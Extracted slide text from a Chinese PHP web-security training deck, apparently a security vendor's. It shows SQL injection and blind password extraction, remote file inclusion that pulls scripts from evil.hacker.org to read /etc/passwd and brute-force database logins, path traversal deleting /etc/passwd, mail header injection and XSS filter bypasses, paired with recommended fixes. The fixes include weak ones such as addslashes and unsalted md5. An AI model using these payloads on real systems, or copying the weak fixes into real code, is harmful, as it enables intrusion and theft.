  • 61. Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
  • 62. Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
  • 63. Get /query.php?name= -1’ union select 1,1,1,1,load_file('c:/boot.ini') C lient Web Server C:\boot.ini
  • 64. 合法 数据长度检测 数据类型检测 数据字符检测 合法 合法 否 合法 出错提示 否 否
  • 65. 客户端检查、过滤 合法 错误提示 错误提示 服务器响应 服务端检查、过滤 合法 处理提交信息 攻击备案 输入 输入 绕过客户端检查 否 是 是 否 客户端 服务端
  • 66. < > & ‘ “ + ; {Whitespace} % / \ # Danger !
  • 67. addslashes mysql_real_escape_strin PDO escapeshellarg escapeshellcmd magic_quotes_gpc register_globals safe_mode allow_url_fopen open_basedir disable_functions 注:解决方案少了,需要更多的时间去完成… …
  • 69. ?
  • 70. Web Server Attacker Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin. ...
  • 71. <?php include($_GET['file'].&quot;.php&quot;); ?> <?php print file_get_contents('/etc/passwd'); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt
  • 72. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php var_dump(get_defined_vars()); die(); ?>
  • 73. <?php include($_GET['file'].&quot;.php&quot;); ?> Get /script.php?file=http%3A%2F%2F evil.hacker.org%2Fevilscript.txt <?php print &quot;Guess user & password demo\n&quot;; include('http://evil.hacker.org/userGuesses.php'); foreach($userGuesses as $user => $password) { $connection = @mysql_connect('localhost', $user, $password); if ($connection) { print &quot;Success with username: $user. Using password: $password\n&quot;; } } ?>
  • 74. ? Right allow_url_fopen allow_url_include($file) ? Advise <?php include($_GET['file'].&quot;.php&quot;); ?> <?php $page = array( 'contact' => 'contact.php', 'help' => 'help.php', 'query' => 'query.php'); if (array_key_exists($_GET['file'], $page)) { include('/full/path/'.$page[$_GET['file']]); } ?> ? Wrong
  • 75. Attacker Web Server Get /del.php?user=../etc&file=passwd Del /etc/passwd success Post file=passwd Success Post…
  • 76. <?php // 从用户目录中删除指定的文件 $username = $_GET['user']; $homedir = &quot;/home/$username&quot;; $file_to_delete = &quot;$userfile&quot;; unlink (&quot;$homedir/$userfile&quot;); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php // 删除硬盘中任何 PHP 有访问权限的文件 $ file_to_delete = $_GET[‘file’]; $username = &quot;../etc/&quot;; $homedir = &quot;/home/../etc/&quot;; $file_to_delete = &quot;passwd&quot;; unlink (&quot;/home/../etc/passwd&quot;); echo &quot;/home/../etc/passwd has been deleted!&quot;; ?> Get /del.php?user=../etc&file=passwd
  • 77. ? Right ? Better <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; $file_to_delete = basename(&quot;$userfile&quot;); // 去除变量中的路径 unlink ($homedir/$file_to_delete); $fp = fopen(&quot;/home/logging/filedelete.log&quot;,&quot;+a&quot;); // 记录删除动作 $logstring = &quot;$username $homedir $file_to_delete&quot;; fwrite ($fp, $logstring); fclose($fp); echo &quot;$file_to_delete has been deleted!&quot;; ?> <?php $username = $_SERVER['REMOTE_USER']; // 使用认证机制 $homedir = &quot;/home/$username&quot;; if (!ereg('^[^./][^/]*$', $userfile)) die('bad filename'); // 停止执行代码 if (!ereg('^[^./][^/]*$', $username)) die('bad username'); // 停止执行代码 ?>
  • 78. ? And 只给 PHP 的 web 用户很有限的权限!
  • 79. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] POST [email_address]
  • 80. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; mail($to, $subject, $message, $from ); ?> To: [email_address] Subject: the subject From: [email_address] Bcc: [email_address] Reply-To: [email_address] … POST fake@example.org\r\nBcc:evil@example.com\r\nReply-To:evil2@example.com
  • 81. <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { print &quot;Error post\n&quot;; } else mail($to, $subject, $message, $from ); ?> ? Right <?php $to = 'nobody@example.com'; $subject = 'the subject'; $message = 'hello'; $from = $_POST[from']; if (! ctype_print ($headers)) { write_logs(IP MESSAGE); print “U IP has been log…\n&quot;; } else mail($to, $subject, $message, $from ); ?> ? Better
  • 83. ?
  • 84. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户访问网站 4. 互联网用户点击主题 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 192.168.1.10 6. 执行危险的操作 cookies 信任域 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 login Webpage+cookies evil
  • 85. Attacker Myspace Post <div style=“background:url()”> Cool ! Post <script.*> 、 onclick, 、 <a href=javascript://> … False Post <divstyle=“background:url(/slideshow/webv10/460315/‘javascript:evil()’)”> False Post <divstyle=“background:url(/slideshow/webv10/460315/‘java script:evil()’)”> False Post <divstyle=“background:url(/slideshow/webv10/460315/‘java&)’)”> Cool!!!Hello,web worm!
  • 87. Web Server Attacker Get /config/horde.php.bak ... $conf['prefs']['driver'] = 'sql'; $conf['prefs']['params'] = array(); $conf['prefs']['params']['phptype'] = 'mysql'; $conf['prefs']['params']['hostspec'] = 'foo.bar'; $conf['prefs']['params']['username'] = 'root'; $conf['prefs']['params']['password'] = 'blabla'; $conf['prefs']['params']['database'] = 'horde'; $conf['prefs']['params']['table'] = 'horde_prefs'; ...
  • 88. ? Wrong
  • 89. ? Right
  • 90. php.ini register_globals: Off allow_url_fopen: Off magic_quotes_gpc: Off magic_quotes_runtime: Off safe_mode: On open_basedir: On displays_errors = off log_errors = on error_log = /var/log/php.log register_globals = off session.use_trans_sid = 0 open_basedir = /servers/www/foo.bar/ expose_php = off Must
  • 92. Attacker Web Server Post wrong username or passwd 用户名或密码错误 Get /login.php 用户: 密码: 确定 取消 Get /script.php?authorized=1 Success login in…
  • 93. <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ... ?> <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { die(&quot;Authorization required&quot;); } ... ?> ? Wrong ? Right
  • 94. ? Better ? Advise <?php $_SESSION['authenticated'] = false; if (authenticate_user()) { $_SESSION['authenticated'] = true; } if (!$_SESSION['authenticated']) { mail(&quot;admin@example.com&quot;, &quot;Possible breakin attempt&quot;, $_SERVER['REMOTE_ADDR']); echo &quot;Security violation, Admin has been alerted.&quot;; exit; } ... ?> register_globals = off error_reporting(E_ALL); ? And
  • 95. <?php if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { $_SESSION['session_id']++; } print “we can guest it\n” ?> ? W rong ? Right <?php Session_start(); if (!isset($_SESSION['session_id'])) { $_SESSION['session_id'] = 1; } else { session_regenerate_id (); } print “we can guest it\n” ?>
  • 97. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,1,1)='a') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(password,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 密码是 admin@#$%! 4. 探测密码 Attacker Web Server TRUE FALSE
  • 98. Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)=‘1') Get /query.asp?name= admin and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名和密码长度 3. 探测用户名和密码长度 HASH 值 120a1b2649c88aef29edd2ffd7359d73 4. 探测密码 Attacker Web Server TRUE FALSE
  • 99. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin admin@#$%! …
  • 100. Web Server Attacker Get /config/database.mdb Database.mdb Username | password Admin 120a1b2649c88aef29edd2ffd7359d73 …
  • 102. <?php // 存储密码散列 $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ? Rigth
  • 103. md5(uniqid(rand(), true)) B etter than md5(uniqid(rand()) ? C ookie
  • 106. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
  • 107. Attacker 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa… 登陆论坛 用户名 : aa 密 码 : aa_passwd
  • 108. Attacker qfw2k3vkei5vinev C lient Web Server faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff WAP 登陆论坛 用户名 : aa 密 码 : aa_passwd 登陆成功,欢迎 aa…
  • 109. Post Forum Message: 用户名 : aa 密 码 : aa_passwd C lient Web Server 登陆成功,欢迎 aa…
  • 110. C lient Web Server Client Arp 病毒 登陆论坛 用户名 : aa 密 码 : aa_passwd <script> evil code </script> 登陆论坛 用户名 : aa 密 码 : aa_passwd
  • 111. Evil Attacked! C lient Web Server 登陆成功,欢迎 aa… <script>evil code</script> 登陆成功,欢迎 aa… Client Arp 病毒
  • 113. Get /afalkjfla/admin123.php C lient Web Server 登陆管理界面成功,欢迎 admin 回家…
  • 114. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
  • 115. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 4. 寻找后台登陆页面 Attacker Web Server FALSE TRUE FALSE
  • 117. 用户客户端 WEB 服务端 数据库 HTML+CSS HTTP REQ Ajax WEB 或者 XML 服务端 数据库 XML HTTP REQ 浏览器 服务端 用户客户端 HTML+CSS JavaScript 浏览器 服务端 ? Web 1.0 ? Web 2.0
  • 118. <cross-domain-policy> <allow-access-from domain=&quot;*&quot;/> </cross-domain-policy> Open API Vulnerable
  • 120. register_globals magic_quotes 开源社区的努力 安全厂商的努力 软件厂商的努力 微软 Google 绿盟 safe_mode PHP … … 极光 弱点防护领域的领导者
  • 122. <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, $username, $password); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, $username, $password); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ? 代码审计服务 绿盟科技安全小组使用白盒 (White Box) 测试对源代码进行审计,找出编程缺陷,并提供改进建议及最佳安全编码实践。
  • 123. <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> <?php $query = sprintf(&quot;INSERT INTO users(name,pwd) VALUES('%s','%s');&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); // 发送请求来验证用户密码 $query = sprintf(&quot;SELECT 1 FROM users WHERE name='%s' AND pwd='%s';&quot;, addslashes($username), md5($password)); $result = pg_query($connection, $query); if (pg_num_rows($result) =< 0) { echo 'Authentication failed for $username.'; } ?> ? 代码审计服务
  • 124. Pentest Pentest Pentest … 绿盟科技渗透测试小组 (NSFOCUS Pen-test Team) 使用多种技术和方法对客户授权指定的设备进行模拟攻击,验证当前的安全防护措施,找出风险点,提供有价值的安全建议。 ? 渗透测试服务 Pen-test Team Web Server Succeed Succeed Succeed
  • 125. 此广告位 招租 请联系 68730606-8502 按出价高低顺序约谈…
  • 126. ?
  • 127. Professional Security Solution Provider Thanks!
AboutCopyright
? 2025 狠狠撸